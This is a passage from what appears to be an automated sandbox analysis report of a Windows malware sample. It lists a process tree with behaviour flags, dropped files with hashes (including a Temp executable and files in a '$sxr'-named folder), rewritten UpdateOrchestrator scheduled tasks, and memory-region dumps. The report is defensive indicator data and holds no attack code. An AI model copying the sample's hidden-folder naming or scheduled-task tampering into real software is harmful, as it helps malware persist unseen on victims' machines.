                                                                                                                                    • C:\Windows\system32\wbem\wmiprvse.exe
                                                                                                                                      C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                                                                                                                      1⤵
                                                                                                                                      • Checks BIOS information in registry
                                                                                                                                      • Checks processor information in registry
                                                                                                                                      • Enumerates system info in registry
                                                                                                                                      PID:2732
                                                                                                                                    • C:\Windows\system32\svchost.exe
                                                                                                                                      C:\Windows\system32\svchost.exe -k netsvcs -p -s wuauserv
                                                                                                                                      1⤵
                                                                                                                                        PID:1584
                                                                                                                                      • C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                        C:\Windows\servicing\TrustedInstaller.exe
                                                                                                                                        1⤵
                                                                                                                                          PID:1788
                                                                                                                                        • C:\Windows\system32\svchost.exe
                                                                                                                                          C:\Windows\system32\svchost.exe -k netsvcs -p -s UsoSvc
                                                                                                                                          1⤵
                                                                                                                                            PID:224
                                                                                                                                          • C:\Windows\System32\mousocoreworker.exe
                                                                                                                                            C:\Windows\System32\mousocoreworker.exe -Embedding
                                                                                                                                            1⤵
                                                                                                                                            • Checks processor information in registry
                                                                                                                                            • Enumerates system info in registry
                                                                                                                                            • Suspicious use of AdjustPrivilegeToken
                                                                                                                                            PID:888
                                                                                                                                          • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                            "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                                            1⤵
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:5376
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:5272
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:4500
                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                            1⤵
                                                                                                                                            • Modifies registry class
                                                                                                                                            • Suspicious use of SetWindowsHookEx
                                                                                                                                            PID:2052
                                                                                                                                          • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                            "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                                            1⤵
                                                                                                                                              PID:1668
                                                                                                                                            • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                              "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                              1⤵
                                                                                                                                                PID:1348
                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                1⤵
                                                                                                                                                  PID:3172
                                                                                                                                                • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                  "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                                                  1⤵
                                                                                                                                                    PID:4240
                                                                                                                                                  • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                    "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                    1⤵
                                                                                                                                                      PID:2840
                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                      1⤵
                                                                                                                                                        PID:4952
                                                                                                                                                      • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                        "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                                                        1⤵
                                                                                                                                                          PID:1536
                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                          1⤵
                                                                                                                                                            PID:2176
                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                            1⤵
                                                                                                                                                              PID:4684
                                                                                                                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                                                              1⤵
                                                                                                                                                                PID:5476
                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                1⤵
                                                                                                                                                                  PID:4384
                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                  1⤵
                                                                                                                                                                    PID:2112
                                                                                                                                                                  • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                                    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                                                                    1⤵
                                                                                                                                                                      PID:4232
                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                      1⤵
                                                                                                                                                                        PID:1852
                                                                                                                                                                      • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                                        "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                                                                        1⤵
                                                                                                                                                                          PID:3544
                                                                                                                                                                        • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                          "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                          1⤵
                                                                                                                                                                            PID:3732
                                                                                                                                                                          • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                            "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                            1⤵
                                                                                                                                                                              PID:464
                                                                                                                                                                            • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                                              "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                                                                              1⤵
                                                                                                                                                                                PID:6056
                                                                                                                                                                              • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                1⤵
                                                                                                                                                                                  PID:4836
                                                                                                                                                                                • C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe
                                                                                                                                                                                  "C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\SearchApp.exe" -ServerName:CortanaUI.AppX8z9r6jm96hw4bsbneegw0kyxx296wr9t.mca
                                                                                                                                                                                  1⤵
                                                                                                                                                                                    PID:3348
                                                                                                                                                                                  • C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe
                                                                                                                                                                                    "C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\TextInputHost.exe" -ServerName:InputApp.AppXk0k6mrh4r2q0ct33a9wgbez0x7v9cz5y.mca
                                                                                                                                                                                    1⤵
                                                                                                                                                                                      PID:4168
                                                                                                                                                                                    • C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe
                                                                                                                                                                                      "C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\StartMenuExperienceHost.exe" -ServerName:App.AppXywbrabmsek0gm3tkwpr5kwzbs55tkqay.mca
                                                                                                                                                                                      1⤵
                                                                                                                                                                                        PID:6072

                                                                                                                                                                                      Network

                                                                                                                                                                                      MITRE ATT&CK Enterprise v15

                                                                                                                                                                                      Replay Monitor

                                                                                                                                                                                      Loading Replay Monitor...

                                                                                                                                                                                      Downloads

                                                                                                                                                                                      • C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        328B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        23e34c2bfe7d76e35994d2104fad309e

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        abadab27462f328493a88d3f2bc90d8770652110

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        346c5d22f8e3a083df1d8b9e21821cf58613228d8b7dfb26013202017635f72d

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        80b4a0164b502d568875711fb05de0abf263ada56c46acf1b4d4584d3aa65d478f1077dfecf87864eab53f97b97ef154603b3348446c9f8d1b3fa5f948046517

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Microsoft\Windows\1033\StructuredQuerySchema.bin

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        414KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        ab79489e9704fc9cc9d8bee4f8e17ec5

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        b2e19a89b43d537bb5b02ee9ca2418f027259c1e

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        4d71760d6f3159849068b635ab4c39b9b747d899f03670533971a62d262c264e

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        60d11ee023b9a045c4b59b88311f001fcf4856e27837a1ffd6ecab0203e5199ee077d85c5217e0f0b94e0bff93b14c3680816b6fbf9d42ee2eff5c23d9a13edd

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Packages\microsoft.windows.search_cw5n1h2txyewy\AC\Microsoft\Internet Explorer\DOMStore\SPEMGLWA\microsoft.windows[1].xml

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        96B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        981b6e891674d906874cdc21d1721367

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        808933593c0ce3813bc22e972ca04e4e21177648

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        0ef58a35ea0209dc424f1d8fbd2118b05c37da5b70cf006c5ad04899c1ffbc7d

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        db0901f67dd4b2f8d1bd0ee0d109918312eb705163938e3e4427e9ad4fdf400343ed684eb661febd13d65e81de7464a17a3772958b14f706666e30f6691585ca

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\Uni.bat.exe

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        445KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        2e5a8590cf6848968fc23de3fa1e25f1

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        801262e122db6a2e758962896f260b55bbd0136a

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        9785001b0dcf755eddb8af294a373c0b87b2498660f724e76c4d53f9c217c7a3

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        5c5ca5a497f39b07c7599194512a112b05bba8d9777bee1cb45bf610483edbffff5f9132fee3673e46cf58f2c3ba21af7df13c273a837a565323b82a7b50a4d8

                                                                                                                                                                                      • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_w00t1zql.ohl.ps1

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        60B

                                                                                                                                                                                        MD5

                                                                                                                                                                                        d17fe0a3f47be24a6453e9ef58c94641

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        6ab83620379fc69f80c0242105ddffd7d98d5d9d

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

                                                                                                                                                                                      • C:\Windows\$sxr-seroxen1\$sxr-nircmd.exe

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        116KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        5ed4728caa339c2a7479102f0c04c087

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        20cd453fcac9d9960b0076715d985a55784a6b53

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        7160db2b7a6680480e64f0845512d203a575f807831faf9a652aaef0988f876c

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        a521eac0d54fbfb9726fad3fafcd7779d455ca46e065a3eafc1a7883961b061550bab8e93ce576904b6c6b2d25cf129ff3d2437ed26a6033ac7c0b4c628dc865

                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        4838ee953dab2c7a1bf57e0c6620a79d

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        8c39cd200f9ffa77739ff686036d0449984f1323

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        22c798e00c4793749eac39cfb6ea3dd75112fd4453a3706e839038a64504d45d

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        066782b16e6e580e2861013c530d22d62c5ba0f217428cc0228ad45b855e979a86d2d04f553f3751cf7d063c6863cb7ea9c86807e7f89c7e0ae12481af65af76

                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        8e64ab95d5d2c4c1e7a757624cb1fffa

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        9889f93ad60bacb07683b4a23c40aa32954646d8

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        dff8902430dcae2fba05fc7f54157c4bc8a7445ed488c1d5727947a0c07075d6

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        3ecc166686c1d7d61e91ec972244118980bf626a88123b87136695ac206e159933ad9f9feb3fd565713dd5d99038f427b845637c51a57497f0ac716de3a7973c

                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        c6086d02f8ce044f5fa07a98303dc7eb

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        6116247e9d098b276b476c9f4c434f55d469129c

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        8901d9c9aea465da4ea7aa874610a90b8cf0a71eba0e321cf9675fceee0b54a0

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        1876d8fc1a8ac83aadb725100ea7a1791bd62d4d0edc1b78802e0bffe458f309a66dc97e1b9da60dd52b8cb80bf471ccb5f8480e6192c9eb2a13eac36462d27a

                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        39b9eb9d1a56bc1792c844c425bd1dec

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        db5a91082fa14eeb6550cbc994d34ebd95341df9

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        acade97e8a1d30477d0dc3fdfea70c2c617c369b56115ec708ed8a2cfdbc3692

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        255b1c1c456b20e6e3415540ef8af58e723f965d1fa782da44a6bbc81b43d8a31c5681777ba885f91ed2dae480bc2a4023e01fe2986857b13323f0459520eb51

                                                                                                                                                                                      • C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        a9124c4c97cba8a07a8204fac1696c8e

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        1f27d80280e03762c7b16781608786f5a98ff434

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        8ad3d28aeff847bc5fb8035cbc7c71e88a4ee547821a8e1a3ea6661ee6014b21

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        537caaa75ac1e257c6b247f9680c3b9e79156ea1bcb3f1326e969a774db33b3c906800813ca6f79369c799a62f4260c91c6dd9a6cace3af25b7dbea5a73e0392

                                                                                                                                                                                      • C:\Windows\System32\vcruntime140_1d.dll

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        52KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        9ef28981adcbf4360de5f11b8f4ecff9

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        219aaa1a617b1dfa36f3928bd1020e410666134f

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        8caaca1bfc909fcb972ceade7be7b80b5855a4621562ee32a10c9903b616d49a

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        ef7f0b25fae749e6134269683f973fef37dfa1969fa4fa0567378ada073c36da4feb17b62d3282c443f4d3ba8b4aeb39063c607c848ade095880d981141adb9c

                                                                                                                                                                                      • C:\Windows\System32\vcruntime140d.dll

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        162KB

                                                                                                                                                                                        MD5

                                                                                                                                                                                        a366d6623c14c377c682d6b5451575e6

                                                                                                                                                                                        SHA1

                                                                                                                                                                                        a8894fcfb3aa06ad073b1f581b2e749b54827971

                                                                                                                                                                                        SHA256

                                                                                                                                                                                        7ed89c668d8ec04c1a0a73f35702b8e0d9819e13e6e7c51c4ac0e0abda6683e6

                                                                                                                                                                                        SHA512

                                                                                                                                                                                        cc7da40652209337d2122cafc903d3c11e31b5a37baf2247034e2f3e1de255e58d0e27fc134ce60a6812e6674fd8bc899f2b434dfc1160053f684cf220e6cb11

                                                                                                                                                                                      • memory/412-193-0x00007FFC00990000-0x00007FFC009A0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64KB

                                                                                                                                                                                      • memory/412-192-0x0000026F646E0000-0x0000026F64707000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        156KB

                                                                                                                                                                                      • memory/436-207-0x00007FFC00990000-0x00007FFC009A0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64KB

                                                                                                                                                                                      • memory/436-206-0x000001FCAFEF0000-0x000001FCAFF17000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        156KB

                                                                                                                                                                                      • memory/624-180-0x000001C49DA10000-0x000001C49DA37000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        156KB

                                                                                                                                                                                      • memory/624-179-0x000001C49D9E0000-0x000001C49DA01000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        132KB

                                                                                                                                                                                      • memory/624-181-0x00007FFC00990000-0x00007FFC009A0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64KB

                                                                                                                                                                                      • memory/684-184-0x0000019760D40000-0x0000019760D67000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        156KB

                                                                                                                                                                                      • memory/684-185-0x00007FFC00990000-0x00007FFC009A0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64KB

                                                                                                                                                                                      • memory/732-210-0x00007FFC00990000-0x00007FFC009A0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64KB

                                                                                                                                                                                      • memory/732-209-0x000001D11AD40000-0x000001D11AD67000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        156KB

                                                                                                                                                                                      • memory/960-189-0x00007FFC00990000-0x00007FFC009A0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64KB

                                                                                                                                                                                      • memory/960-188-0x0000026040FA0000-0x0000026040FC7000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        156KB

                                                                                                                                                                                      • memory/1000-212-0x000001CB8E320000-0x000001CB8E347000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        156KB

                                                                                                                                                                                      • memory/1000-213-0x00007FFC00990000-0x00007FFC009A0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64KB

                                                                                                                                                                                      • memory/1076-199-0x000001D1F1010000-0x000001D1F1037000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        156KB

                                                                                                                                                                                      • memory/1076-200-0x00007FFC00990000-0x00007FFC009A0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64KB

                                                                                                                                                                                      • memory/1104-215-0x0000020C5F700000-0x0000020C5F727000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        156KB

                                                                                                                                                                                      • memory/1104-216-0x00007FFC00990000-0x00007FFC009A0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64KB

                                                                                                                                                                                      • memory/1136-499-0x00007FFC22153000-0x00007FFC22155000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        8KB

                                                                                                                                                                                      • memory/1136-51-0x00007FFC40910000-0x00007FFC40B08000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2.0MB

                                                                                                                                                                                      • memory/1136-1330-0x00007FFC22150000-0x00007FFC22C12000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.8MB

                                                                                                                                                                                      • memory/1136-504-0x00007FFC22150000-0x00007FFC22C12000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.8MB

                                                                                                                                                                                      • memory/1136-161-0x00007FFC40910000-0x00007FFC40B08000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2.0MB

                                                                                                                                                                                      • memory/1136-50-0x00000240183B0000-0x0000024018A60000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        6.7MB

                                                                                                                                                                                      • memory/1136-49-0x0000024018000000-0x0000024018390000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        3.6MB

                                                                                                                                                                                      • memory/1136-500-0x00007FFC22150000-0x00007FFC22C12000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.8MB

                                                                                                                                                                                      • memory/1136-52-0x00007FFC3E980000-0x00007FFC3EA3D000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        756KB

                                                                                                                                                                                      • memory/1136-47-0x00007FFC22150000-0x00007FFC22C12000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.8MB

                                                                                                                                                                                      • memory/1136-46-0x00007FFC22150000-0x00007FFC22C12000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        10.8MB

                                                                                                                                                                                      • memory/1136-55-0x00007FFC40910000-0x00007FFC40B08000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2.0MB

                                                                                                                                                                                      • memory/1136-36-0x00007FFC22153000-0x00007FFC22155000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        8KB

                                                                                                                                                                                      • memory/1136-56-0x00007FFC3E980000-0x00007FFC3EA3D000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        756KB

                                                                                                                                                                                      • memory/1136-148-0x000002407F780000-0x000002407F7D0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        320KB

                                                                                                                                                                                      • memory/1136-162-0x00007FFC3E980000-0x00007FFC3EA3D000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        756KB

                                                                                                                                                                                      • memory/1136-151-0x000002401A390000-0x000002401A3BE000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        184KB

                                                                                                                                                                                      • memory/1136-150-0x000002407FB70000-0x000002407FD32000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        1.8MB

                                                                                                                                                                                      • memory/1136-149-0x000002407F8E0000-0x000002407F992000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        712KB

                                                                                                                                                                                      • memory/1180-219-0x00007FFC00990000-0x00007FFC009A0000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        64KB

                                                                                                                                                                                      • memory/1180-218-0x0000024E6BD80000-0x0000024E6BDA7000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        156KB

                                                                                                                                                                                      • memory/2044-176-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        164KB

                                                                                                                                                                                      • memory/2044-164-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        164KB

                                                                                                                                                                                      • memory/2044-165-0x00007FFC40910000-0x00007FFC40B08000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        2.0MB

                                                                                                                                                                                      • memory/2044-163-0x0000000140000000-0x0000000140029000-memory.dmp

                                                                                                                                                                                        Filesize

                                                                                                                                                                                        164KB

                                                                                                                                                                                      • memory/2044-166-0x00007FFC3E980000-0x00007FFC3EA3D000-memory.dmp

